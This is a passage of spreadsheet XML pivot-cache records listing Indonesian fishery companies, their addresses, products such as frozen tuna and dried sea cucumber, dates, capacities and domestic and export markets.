    <s v="Jl. Sawah Desa RT 3 RW 2, Kel. Kedungpedaringan, Kec. Kepanjen, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Lamongan"/>
    <m/>
  </r>
  <r>
    <n v="22047"/>
    <x v="616"/>
    <s v="UD. PUTRA ANELA MANDIRI"/>
    <s v="Jl. Sawah Desa RT 3 RW 2, Kel. Kedungpedaringan, Kec. Kepanjen, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Layang)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Lamongan"/>
    <m/>
  </r>
  <r>
    <n v="22048"/>
    <x v="164"/>
    <s v="PT. SARI SEGAR LAUT INDONESIA"/>
    <s v="Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="22049"/>
    <x v="617"/>
    <s v="PT. LOUISIANA FAR EAST"/>
    <s v="Jl. Rembang Industri II/36, 36A, 36B, Kawasan Berikat (EPZ) PIER, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="22050"/>
    <x v="618"/>
    <s v="PT. NARDEVCHEM KEMINDO"/>
    <s v="Komplek Industri dan Pergudangan Taman Tekno Tahap 2 Sektor XI Blok J2 No.15, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Minyak Ikan"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="22051"/>
    <x v="619"/>
    <s v="CV. SAMUDERA ARU PRATAMA"/>
    <s v="Pergudangan Safe Lock Blok AH 5806, Kel. Pucang Anom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Gabus Laut, Gulama, Lencam, Manyung)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Sidoarjo, Kota Probolinggo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22052"/>
    <x v="620"/>
    <s v="PT. GOLDEN TUNA"/>
    <s v="Jl. Ikan Tuna Barat II - Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Fillet Beku (Lemadang, Marlin, Gindara, Layaran, Cakalang, Todak, Tenggiri)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Cilacap, Kota Semarang, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22053"/>
    <x v="619"/>
    <s v="CV. SAMUDERA ARU PRATAMA"/>
    <s v="Pergudangan Safe Lock Blok AH 5806, Kel. Pucang Anom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Kembung, Selar, Cakalang, Barakuda)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Sidoarjo, Kota Probolinggo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22054"/>
    <x v="619"/>
    <s v="CV. SAMUDERA ARU PRATAMA"/>
    <s v="Pergudangan Safe Lock Blok AH 5806, Kel. Pucang Anom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="15"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22055"/>
    <x v="621"/>
    <s v="CV. NAPIT NAULI"/>
    <s v="Pelabuhan Tengkayu II, Kel. SDF Pelabuhan, Kec. Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Bandeng Beku"/>
    <d v="2020-10-05T00:00:00"/>
    <n v="900000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22056"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Segar (Lencam, Anggoli, Kerapu, Bawal, Kakap, Layur)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22057"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22058"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22059"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Cumi-Cumi Segar"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22062"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Gurita Segar"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22063"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Sotong Segar"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22064"/>
    <x v="622"/>
    <s v="PT. LAUT NUSANTARA JUARA"/>
    <s v="Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Bulu Babi Segar"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22065"/>
    <x v="623"/>
    <s v="CV. KARYA BITUNG"/>
    <s v="Jl. Raya Manado - Bitung, Kel. Tontalete, Kec. Kema, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Malalugis, Layang, Cakalang)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22066"/>
    <x v="623"/>
    <s v="CV. KARYA BITUNG"/>
    <s v="Jl. Raya Manado - Bitung, Kel. Tontalete, Kec. Kema, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22067"/>
    <x v="623"/>
    <s v="CV. KARYA BITUNG"/>
    <s v="Jl. Raya Manado - Bitung, Kel. Tontalete, Kec. Kema, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22068"/>
    <x v="623"/>
    <s v="CV. KARYA BITUNG"/>
    <s v="Jl. Raya Manado - Bitung, Kel. Tontalete, Kec. Kema, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Bandeng Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22069"/>
    <x v="606"/>
    <s v="PT. SARI CAKALANG"/>
    <s v="Madidir Weru Lingkungan IV, Kel. Madidir Weru, Kec. Bitung Tengah, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Tangerang, Kota Denpasar, Kota Makassar"/>
    <s v="Japan, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22070"/>
    <x v="624"/>
    <s v="PT. ASAHAN HASIL LAUT"/>
    <s v="Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="22071"/>
    <x v="624"/>
    <s v="PT. ASAHAN HASIL LAUT"/>
    <s v="Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="22072"/>
    <x v="624"/>
    <s v="PT. ASAHAN HASIL LAUT"/>
    <s v="Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Biji Nangka, Sukang, Bawal, Samge, Malong, Layur)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="22073"/>
    <x v="624"/>
    <s v="PT. ASAHAN HASIL LAUT"/>
    <s v="Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="22074"/>
    <x v="624"/>
    <s v="PT. ASAHAN HASIL LAUT"/>
    <s v="Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22075"/>
    <x v="624"/>
    <s v="PT. ASAHAN HASIL LAUT"/>
    <s v="Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22076"/>
    <x v="625"/>
    <s v="PT, ANEKA SUMBER TATA BAHARI"/>
    <s v="Jl, Hurnala II, Kel, Tulehu, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Cakalang)"/>
    <d v="2020-09-22T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22077"/>
    <x v="625"/>
    <s v="PT, ANEKA SUMBER TATA BAHARI"/>
    <s v="Jl, Hurnala II, Kel, Tulehu, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-22T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Surabaya"/>
    <s v="Australia, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22079"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22080"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cumi-cumi Kering"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22081"/>
    <x v="117"/>
    <s v="PT. BUDI JAYA BERDIKARI"/>
    <s v="Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Segar"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22082"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="22083"/>
    <x v="123"/>
    <s v="PT. JAWA SUISAN INDAH"/>
    <s v="Jl. Cipatuguran SLK IPB Kampung Neglasari RT 03 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Sidat Panggang Beku"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Timur"/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="22085"/>
    <x v="626"/>
    <s v="PT. ALGALINDO PERDANA"/>
    <s v="Jl. Pelem, Kel. Bulusari, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="250"/>
    <s v="Kabupaten Boyolali, Kota Tangerang"/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="22086"/>
    <x v="627"/>
    <s v="PT. MOROTAI MARINE CULTURE"/>
    <s v="Desa Ngele-ngele Besar, Kec. Morotai Selatan Barat, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Udang Beku"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Surabaya, Kabupaten Halmahera Utara, Kabupaten Pulau Morotai, Kota Ternate"/>
    <s v="China, Japan, Kazakhstan"/>
  </r>
  <r>
    <n v="22089"/>
    <x v="595"/>
    <s v="PT. MALUKU PRIMA SUKSES"/>
    <s v="Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Kakap)"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22092"/>
    <x v="628"/>
    <s v="CV. MAJU BERKEMBANG JAYA"/>
    <s v="Desa Temperak No.77 RT 06 RW 01, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cumi-cumi Kering"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22093"/>
    <x v="628"/>
    <s v="CV. MAJU BERKEMBANG JAYA"/>
    <s v="Desa Temperak No.77 RT 06 RW 01, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Semarang, Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22094"/>
    <x v="628"/>
    <s v="CV. MAJU BERKEMBANG JAYA"/>
    <s v="Desa Temperak No.77 RT 06 RW 01, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Semarang, Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22104"/>
    <x v="629"/>
    <s v="PT. BERKAH HASIL NUSANTARA"/>
    <s v="Komplek PPS Kendari Jl. Tuna 5, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22105"/>
    <x v="629"/>
    <s v="PT. BERKAH HASIL NUSANTARA"/>
    <s v="Komplek PPS Kendari Jl. Tuna 5, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="700000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22106"/>
    <x v="629"/>
    <s v="PT. BERKAH HASIL NUSANTARA"/>
    <s v="Komplek PPS Kendari Jl. Tuna 5, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap Merah, Kaci-kaci)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22107"/>
    <x v="629"/>
    <s v="PT. BERKAH HASIL NUSANTARA"/>
    <s v="Komplek PPS Kendari Jl. Tuna 5, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22111"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Oman, Viet Nam"/>
  </r>
  <r>
    <n v="22112"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22113"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Keong Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Malaysia"/>
  </r>
  <r>
    <n v="22114"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia"/>
  </r>
  <r>
    <n v="22115"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang)"/>
    <d v="2020-11-06T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22116"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-11-06T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Thailand, United States"/>
  </r>
  <r>
    <n v="22117"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi, Gurita)"/>
    <d v="2020-11-06T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="22118"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Demersal Beku (Lencam, Pisang-pisang, Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2020-11-06T00:00:00"/>
    <n v="3000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22119"/>
    <x v="630"/>
    <s v="UD. BENSON S PERMAI"/>
    <s v="Komplek Pergudangan Margomulyo Permai Blok N-10A, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22120"/>
    <x v="630"/>
    <s v="UD. BENSON S PERMAI"/>
    <s v="Komplek Pergudangan Margomulyo Permai Blok N-10A, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Barat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22121"/>
    <x v="630"/>
    <s v="UD. BENSON S PERMAI"/>
    <s v="Komplek Pergudangan Margomulyo Permai Blok N-10A, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Barat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22123"/>
    <x v="371"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Raya Gumuk Rejo RT 02 RW 02, Kel. Gumukrejo, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Lampung Barat, Kabupaten Lampung Selatan, Kabupaten Lampung Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang"/>
    <s v="China, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="22124"/>
    <x v="631"/>
    <s v="PERUM PERIKANAN INDONESIA REMBANG"/>
    <s v="Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
